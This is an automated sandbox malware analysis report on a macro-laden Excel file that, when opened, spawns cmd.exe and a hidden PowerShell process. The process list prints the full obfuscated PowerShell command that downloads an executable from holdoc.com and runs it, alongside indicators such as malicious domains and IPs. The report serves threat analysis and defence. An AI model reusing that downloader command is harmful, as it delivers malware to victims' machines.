Automated Malware Analysis Report for 18-02-22-(K-Irie).Xls

ID: 47598 Sample Name: 18-02-22-(k- irie).xls Cookbook: defaultwindowsofficecookbook.jbs Time: 01:30:58 Date: 23/02/2018 Version: 21.0.0 Table of Contents

Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Confidence 5 Classification 5 Analysis Advice 5 Signature Overview 6 AV Detection: 6 Software Vulnerabilities: 6 Networking: 6 Data Obfuscation: 6 Spreading: 6 System Summary: 6 HIPS / PFW / Operating System Protection Evasion: 7 Anti Debugging: 7 Malware Analysis System Evasion: 7 Hooking and other Techniques for Hiding and Protection: 7 Language, Device and Operating System Detection: 7 Behavior Graph 7 Simulations 8 Behavior and APIs 8 Antivirus Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 9 Yara Overview 9 Initial Sample 9 PCAP (Network Traffic) 9 Dropped Files 9 Memory Dumps 9 Unpacked PEs 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 9 Dropped Files 10 Screenshot 10 Startup 11 Created / dropped Files 11 Contacted Domains/Contacted IPs 12 Contacted Domains 12 Contacted IPs 12 Static File Info 13 General 13 File Icon 13 Static OLE Info 13 General 13 OLE File "18-02-22-(k-irie).xls" 14 Indicators 14 Summary 14 Document Summary 14 Streams with VBA 14 Copyright Joe Security LLC 2018 Page 2 of 23 VBA File Name: Sheet1.cls, Stream Size: 977 14 General 14 VBA Code Keywords 14 VBA Code 14 VBA File Name: ThisWorkbook.cls, Stream Size: 5760 14 General 14 VBA Code Keywords 15 VBA Code 16 Streams 16 Stream Path: \x1CompObj, File Type: data, Stream Size: 107 16 General 16 Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 240 16 General 16 Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168 17 General 17 Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55082 17 General 17 Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 425 17 General 17 Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62 17 General 17 Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3005 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1414 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 106 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 548 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 481 19 General 19 Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 524 19 General 19 Network Behavior 19 Network Port Distribution 19 TCP Packets 19 UDP Packets 20 ICMP Packets 20 DNS Queries 20 DNS Answers 20 HTTP Request Dependency Graph 20 HTTP Packets 20 Code Manipulations 21 Statistics 21 Behavior 21 System Behavior 21 Analysis Process: EXCEL.EXE PID: 3268 Parent PID: 2948 21 General 21 File Activities 21 Registry Activities 22 Key Created 22 Analysis Process: cmd.exe PID: 3348 Parent PID: 3268 22 General 22 Analysis Process: powershell.exe PID: 3376 Parent PID: 3348 22 General 22 File Activities 23 File Created 23 File Deleted 23 Registry Activities 23 Disassembly 23 Code Analysis 23

Overview

General Information

Joe Sandbox Version: 21.0.0 Analysis ID: 47598 Start time: 01:30:58 Joe Sandbox Product: CloudBasic Start date: 23.02.2018 Overall analysis duration: 0h 4m 16s Hypervisor based Inspection enabled: false Report type: light Sample file name: 18-02-22-(k-irie).xls Cookbook file name: defaultwindowsofficecookbook.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Number of analysed new started processes analysed: 7 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies HCA enabled EGA enabled HDC enabled GSI enabled (VBA) Analysis stop reason: Timeout Detection: MAL Classification: mal84.evad.expl.winXLS@5/3@3/2 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: Failed HDC Information: Failed Cookbook Comments: Adjust boot time Found application associated with file extension: .xls Found Word or Excel or PowerPoint document Simulate clicks Number of clicks 142 Close Viewer

Warnings: Show All Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE, powershell.exe

Detection

Strategy Score Range Reporting Detection

Threshold 84 0 - 100 Report FP / FN

Strategy Score Range Further Analysis Required? Confidence

Threshold 5 0 - 5 false

Classification

Ransomware

Miner Spreading

mmaallliiiccciiioouusss

malicious

Evader Phishing

sssuusssppiiiccciiioouusss

suspicious

cccllleeaann

clean

Exploiter Banker

Spyware Trojan / Bot

Adware

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior Copyright Joe Security LLC 2018 Page 5 of 23 Signature Overview

• AV Detection • Software Vulnerabilities • Networking • Data Obfuscation • Spreading • System Summary • HIPS / PFW / Operating System Protection Evasion • Anti Debugging • Malware Analysis System Evasion • Hooking and other Techniques for Hiding and Protection • Language, Device and Operating System Detection

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Document exploit detected (process start blacklist hit)

Networking:

Downloads files from webservers via HTTP

Performs DNS lookups

Urls found in memory or binary data

Domain name seen in connection with other malware

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Obfuscated command line found

Spreading:

Enumerates the file system

System Summary:

Checks whether correct version of .NET is installed

Found graphical window changes (likely an installer)

Uses Microsoft Silverlight

Checks if Microsoft Office is installed

Binary contains paths to debug symbols

Binary contains paths to development resources

Classification label

Creates files inside the user directory

Creates temporary files

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Found command line output

Parts of this applications are using the .NET runtime (Probably coded in C#)

Reads ini files

Reads software policies

Sample is known by Antivirus (Virustotal or Metascan)

Spawns processes

Uses an in-process (OLE) Automation server

Creates mutexes

Document contains embedded VBA macros

Reads the hosts file

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA macro which may execute processes

Powershell connects to network

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Enables debug privileges

Malware Analysis System Evasion:

Queries a list of all running processes

Enumerates the file system

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

System process connects to network (likely due to code injection or exploit)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Behavior Graph

Copyright Joe Security LLC 2018 Page 7 of 23 Hide Legend Behavior Graph Legend: ID: 47598 Process Sample: 18-02-22-(k-irie).xls

Startdate: 23/02/2018 Signature Architecture: WINDOWS Score: 84 Created File DNS/IP Info

holdoc.com Is Dropped

started Is Windows Process

Multi AV Scanner detection Multi AV Scanner detection Obfuscated command line 3 other signatures for domain / URL for submitted file found Number of created Registry Values

Number of created Files

EXCEL.EXE Visual Basic

34 17 Delphi Java

Document exploit detected Obfuscated command line (process start blacklist started .Net C# or VB.NET found hit) C, C++ or other language

cmd.exe Is malicious

Obfuscated command line started found

powershell.exe

12 8

holdoc.com 8.8.8.8, 53, 53440, 56842 92.53.78.250, 49163, 49164, 80 GOOGLE-GoogleIncUS SELECTELRU United States Russian Federation

System process connects to network (likely due Powershell connects to code injection or to network exploit)

Simulations

Behavior and APIs

Time Type Description 01:31:49 API Interceptor 1x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms 01:31:49 API Interceptor 1x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms 01:31:49 API Interceptor 1x Sleep call for process: EXCEL.EXE modified from: 300000ms to: 100ms 01:31:54 API Interceptor 1x Sleep call for process: powershell.exe modified from: 30000ms to: 100ms

Antivirus Detection

Initial Sample

Source Detection Scanner Label Link 18-02-22-(k-irie).xls 31% virustotal Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Domains

Source Detection Scanner Label Link holdoc.com 4% virustotal Browse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

Associated Sample Match Name / URL SHA 256 Detection Link Context holdoc.com 2018.2.20[s_kawadu].xls 8b93eb0c322299acebe65e6014a malicious Browse 47.52.193.63 ccdc02f289e3a4bf411783e8bfcd 01e887174 2018.2.20[s_kawadu].xls 8b93eb0c322299acebe65e6014a malicious Browse 47.52.193.63 ccdc02f289e3a4bf411783e8bfcd 01e887174

ASN

Associated Sample Match Name / URL SHA 256 Detection Link Context SELECTELRU 7969991545.doc 5ace6070a2f1c6ecaf06b1f84469 malicious Browse 82.202.221.88 98e42540254c1d117064445e44f 8ccc56739 trickbot.exe 91f78068e996b1b32a3539746b6 malicious Browse 95.213.237.224 b683f5fa40e7be009b779c56e215 b521df6c5 YhAjMikwxY.docx 8c30c4096f77feb5103eb18cddc5 malicious Browse 77.244.219.111 cb6b74759e7782524dff5bf73356 89dce3fd

Copyright Joe Security LLC 2018 Page 9 of 23 Associated Sample Match Name / URL SHA 256 Detection Link Context http://outpostbeerco malicious Browse 78.155.207.67 mpany.com/? 14A7a2hYF 84Gn38Amn=rjones@ric ohforensics.com php.exe 57b374e2d2f002c11c69b454fcf1 malicious Browse 82.202.238.204 aa57bd971cd0638eca12c6691cd b6a2f011c jas-pol.com.pl/jerse malicious Browse 95.213.236.187 y/meronto.png http://princessleith malicious Browse 82.202.238.203 eatonde-grimaldi.com/? 3os4aoVie6DsIKoEd= BOGOQJQADW CQlPAGCF3LUw 4877_Payment.doc 4972a3d5648283283163eac33a6 malicious Browse 92.53.66.60 235fa7c864eae8058d33543b690 27fd372a01 gGCRjiezSf.doc d4443f53a7966b856facd134edc7 malicious Browse 92.53.78.209 7f8ae8a7e7d0d89974a266ca3e5 77da3c0a6 23515_155123.doc 7157e139fa9e8f1394319742a2f6 malicious Browse 95.213.191.147 65965e939299217586e51d4c207 a4048d7cf 23515_155123.doc 7157e139fa9e8f1394319742a2f6 malicious Browse 95.213.204.162 65965e939299217586e51d4c207 a4048d7cf banan.exe 8a9741c8a47088e1633ea9b1c9a malicious Browse 95.213.251.150 48fd00aa16ee2a99652435ce77a 5ccaaf2fa9 yUGZKvXCSt.doc 5a9e67a59c80a89293f676b55b4 malicious Browse 95.213.194.234 157fbbdd7c504224937b71e352c a7386e1028 Jgm1omfumn.doc 6fbf7c2ba517468f2a2a80d80c2a malicious Browse 92.53.66.115 e220fed9ec31c272dd1948dfd6c3 f5aed14b http://bbsmoke.com?F malicious Browse 92.53.77.216 E7JoX=dcairns@bchous ing.org 37Faktura_VAT_902675 fbe473e2f716f588438ec7a9e27e malicious Browse 95.213.235.66 109.js 9afaed32106ffa55681ff3107a09a f83c057 yUGZKvXCSt.doc 5a9e67a59c80a89293f676b55b4 malicious Browse 78.155.206.154 157fbbdd7c504224937b71e352c a7386e1028 http://luxurytds.com malicious Browse 95.213.144.13 /go.php?sid=1 BXT8KfER5.exe 0c5446a511b349773e1031b88cd malicious Browse 185.143.174.234 4fd997cd98b686a4cd4ca5dc16b 386961e2c5 virus.exe a7e40660025a2f92bf5b27a429c2 malicious Browse 80.93.182.14 a65038932203d7d6c33168f01c4 7b34868fa

Dropped Files

No context

Screenshot

System is w7 EXCEL.EXE (PID: 3268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 716335EDBB91DA84FC102425BFDA957E) cmd.exe (PID: 3348 cmdline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2} {4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe''' MD5: AD7B9C14083B52BC532FBA5948342B98) powershell.exe (PID: 3376 cmdline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0} {2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.exe')}while(!$?);&(\'{0}{2}{1}\'-f'sta r','ss','t-proce') 'C:\Users\user\AppData\Local.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) cleanup

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\18-02-22-(k-irie).LNK File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 1 3:59:30 2017, mtime=Sun Sep 24 13:59:30 2017, atime=Fri Feb 23 00:31:50 2018, length=76288, window=hide Size (bytes): 2160 Entropy (8bit): 4.507208926102992 Encrypted: false MD5: 941E5D0C91732D133D3EA6FCC59651EC SHA1: F79505767A693BC2431A1998CABAFC764286F0ED SHA-256: 1E589ACDB46B7DB1C8747C2A13E11AF6183FE3BBDB83F0A00CB03E580C8F814A SHA-512: 0E29F144B8E6B10C771ABED68BCDB0E85B250D72536565EB6F12C761242790348643968AC17F4D4AED4BF1267DD 66A574600640343460306051B13BE3C4F3488

Copyright Joe Security LLC 2018 Page 11 of 23 C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\18-02-22-(k-irie).LNK Malicious: false Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat File Type: ASCII text, with CRLF line terminators Size (bytes): 89 Entropy (8bit): 4.308920442144782 Encrypted: false MD5: 7ECA590620832E8C4F36972F48AB7288 SHA1: 8C564C6FD711A53DCCFB71E204F9C74287840EE5 SHA-256: 7323108B5FB167A226B7D6BBA70E8F7671B3E883C043CA3E5D27E3E9AD33D712 SHA-512: D0A45C0EC7840AC91E7D5024CC0855944610F5DDFA7AC726EB852A325542764960420B9830FA068D19D5FA7D58D ECC477475B24E81BF768D7B98F2318C81CFE1 Malicious: false Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1IS066BSM420YYOJ2CE3.temp File Type: data Size (bytes): 8016 Entropy (8bit): 3.5770961918243596 Encrypted: false MD5: DE54B0C562108894094B2BEF832CBF46 SHA1: A046BDD493711C314BC0E8040778A17E155C16C5 SHA-256: F268E4960C227505DFEA1FD03987D52DC45095AF7C0820D8C7AA3EB17635C0EE SHA-512: 0E850A2BDA1A32E812B45FAF424131E7347F09B14CAA0691468CA48A96929934664E57BADAAEAF61BA509B750A 7B0834D24E6E18835D7F604D0ADD61508C32DA Malicious: false Reputation: low

Contacted Domains/Contacted IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection holdoc.com 92.53.78.250 true true 4%, virustotal, Browse

Contacted IPs

25% < No. of IPs < 50% 50% < No. of IPs < 75%

75% < No. of IPs

IP Country Flag ASN ASN Name Malicious 8.8.8.8 United States 15169 GOOGLE-GoogleIncUS false 92.53.78.250 Russian Federation 49505 SELECTELRU true

Static File Info

General

File type: 0 Entropy (8bit): 6.047278042035873 TrID: Microsoft Excel sheet (30009/1) 46.87% Microsoft Excel sheet (alternate) (24509/1) 38.28% Generic OLE2 / Multistream Compound File (8008/1) 12.51% Java Script embedded in Visual Basic Script (1500/0) 2.34%

File name: 18-02-22-(k-irie).xls File size: 75264 MD5: 1fde2f4438d222541a78d63e85043e63 SHA1: a2e40c537dc3a73b77199a4d8eaf76826f819df6 SHA256: f29afa4665c7d226d093d083a72431237b76c9dbb10bf53 1c3eaa56090ecf277 SHA512: abecf769db1050cec94a76b0cc7eadd645e3061d2bdde6 bd2bca0dbcec3e035176b3ecee64bff1e72a75e864b25a6 882b5ada58f421c0a3554ec366a07de67a1 File Content Preview: ...... >...... o......

File Icon

Static OLE Info

General Document Type: OLE Number of OLE Files: 1 Copyright Joe Security LLC 2018 Page 13 of 23 OLE File "18-02-22-(k-irie).xls"

Indicators Has Summary Info: True Application Name: Microsoft Excel Encrypted Document: False Contains Word Document Stream: False Contains Workbook/Book Stream: True Contains PowerPoint Document Stream: False Contains Visio Document Stream: False Contains ObjectPool Stream: False Flash Objects Count: 0 Contains VBA Macros: True

Summary Code Page: 1251 Create Time: 2017-10-19 07:59:05 Last Saved Time: 2018-02-22 08:21:27 Creating Application: Microsoft Excel Security: 0

Document Summary Document Code Page: -535 Thumbnail Scaling Desired: False Contains Dirty Links: False Shared Document: False Changed Hyperlinks: False Application Version: 917504

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General Stream Path: _VBA_PROJECT_CUR/VBA/Sheet1 VBA File Name: Sheet1.cls Stream Size: 977 Data ASCII: ...... # ...... x ...... M E ...... Data Raw: 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c3 e6 d2 fd 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword False VB_Exposed Attribute VB_Name VB_Creatable VB_PredeclaredId VB_GlobalNameSpace VB_Base VB_Customizable VB_TemplateDerived

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 5760

General Stream Path: _VBA_PROJECT_CUR/VBA/ThisWorkbook VBA File Name: ThisWorkbook.cls Stream Size: 5760 Copyright Joe Security LLC 2018 Page 14 of 23 General Data ASCII: ...... J . . . X ...... ? . . . . # ...... < ...... X ` . ) ~ . I . . . . | s ...... F ...... t . F . - Q . . . s ...... x ...... t . F . - Q . . . s . . X ` . ) ~ . I . . . . | s ...... M E ...... Data Raw: 01 16 01 00 03 00 01 00 00 1c 07 00 00 e4 00 00 00 10 02 00 00 4a 07 00 00 58 07 00 00 f4 10 00 00 00 00 00 00 01 00 00 00 c3 e6 f3 3f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 d9 58 60 1a 29 7e f6 49 be 02 fe bd 7c 73 f2 e9 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword cryocamera "ThisWorkbook" capponecheese zyzybridge ramzessii "xeC" Shell "p://holdoc.com/lantrace','%" "Ct") petroliummer() "owe" "t','ne" depminng Right(Left("multiplexed", copengagend gabrilla False Workbook_Open() zulusniga petroliummer Array("t" (\""{" ramzessii() zyzybridge() gabrilla() goldgoldtime() "o','bj" nagilanile vandamilkler "do{sl" "st','.we" samaramama() Right(Left("lighttight", fidopinions brucegodd Minute(Now), brucegodd(depminng) "}\"" "bclie','em','nt','.ne'" "f'-" "ppd" VB_Base Randomize Left("calamander", samaramama, normalcorrecttoolk "l'+'e')." hannydear VB_Creatable Now(), VB_Exposed Now()) "'sy"

Copyright Joe Security LLC 2018 Page 15 of 23 Keyword maffii fatalerrrrord "DDen "'+'o" fatalerrrrord() Array(Now(), msoAlignLefts depminng() "RS", virtoserer samaramama "-N") "-e") Attribute goldgoldtime Array(Second(Now), VB_PredeclaredId VB_GlobalNameSpace okolokojim heroscopuses "ata") VB_Name Int(Rnd Function VB_Customizable SingleSong() ").(" SingleSong labuyetero VB_TemplateDerived "oke('" Left("Invisible", "w'+'n" Monochrome "t',"

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General Stream Path: \x1CompObj File Type: data Stream Size: 107 Entropy: 4.18482950044 Base64 Encoded: True Data ASCII: ...... F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q ...... Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 240

General Stream Path: \x5DocumentSummaryInformation File Type: data Stream Size: 240 Entropy: 3.03421468289 Base64 Encoded: True

Copyright Joe Security LLC 2018 Page 16 of 23 General Data ASCII: ...... + , . . 0 ...... H ...... P ...... X ...... ` ...... h ...... p ...... x ...... 2 0 1 8 . . . 2 . . . 2 2 ...... W o r k s h e e t s ...... Data Raw: fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9a 00 00 00 02 00 00 00 e9 fd 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168

General Stream Path: \x5SummaryInformation File Type: data Stream Size: 168 Entropy: 3.4271007557 Base64 Encoded: False Data ASCII: ...... O h . . . . . + ' . . 0 . . . x ...... 8 ...... @ ...... X ...... d ...... p ...... M i c r o s o f t E x c e l . @ . . . . . @ " . H . . @ . . . . ] 2 " ...... Data Raw: fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 12 00 00 00 40 00 00 00 0c 00 00 00 58 00 00 00 0d 00 00 00 64 00 00 00 13 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 10 00 00 00 4d 69 63 72 6f 73 6f 66

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55082

General Stream Path: Workbook File Type: Applesoft BASIC program data, first line number 16 Stream Size: 55082 Entropy: 6.52470798361 Base64 Encoded: True Data ASCII: ...... f 2 ...... \\ . p . . . . V A R M U S B . . . . . a ...... = ...... T h i s W o r k b o o k ...... = . . . . . i . . l . 7 8 ...... X . @ Data Raw: 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 56 41 52 4d 55 53 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 425

General Stream Path: _VBA_PROJECT_CUR/PROJECT File Type: ASCII text, with CRLF line terminators Stream Size: 425 Entropy: 5.34572053125 Base64 Encoded: True Data ASCII: I D = " { 6 E 9 6 D 5 0 9 - D 0 3 C - 4 D A F - B C 3 2 - 9 0 C B 9 0 E 3 A 5 3 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 1 9 3 6 6 8 E 6 A 8 E 6 A 8 E 6 A 8 E 6 A " . . D P B = " 7 E 7 C 8 9 9 E 9 B 6 6 8 9 6 7 8 9 6 7 8 9 " . . G C = " 6 B 6 9 9 C 8 D 8 8 8 E 8 8 Data Raw: 49 44 3d 22 7b 36 45 39 36 44 35 30 39 2d 44 30 33 43 2d 34 44 41 46 2d 42 43 33 32 2d 39 30 43 42 39 30 45 33 41 35 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General Stream Path: _VBA_PROJECT_CUR/PROJECTwm File Type: data Stream Size: 62 Entropy: 3.05546715432 Base64 Encoded: False Data ASCII: T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .

Copyright Joe Security LLC 2018 Page 17 of 23 General Data Raw: 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3005

General Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT File Type: data Stream Size: 3005 Entropy: 4.49677521188 Base64 Encoded: False Data ASCII: . a ...... * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . Data Raw: cc 61 97 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1414

General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0 File Type: data Stream Size: 1414 Entropy: 4.24915005422 Base64 Encoded: False Data ASCII: . K * ...... r U ...... ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ l ...... 0 . . * B L . . P . . . } ...... y ...... Data Raw: 93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 6c 00 00 7f 00 00 00 00 15 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 106

General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1 File Type: data Stream Size: 106 Entropy: 2.1837232906 Base64 Encoded: False Data ASCII: r U ...... ~ } ...... 1 ...... p ...... Data Raw: 72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff 03 00 00 09 e1 02 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 70 00 00 7f 00 00 00 00

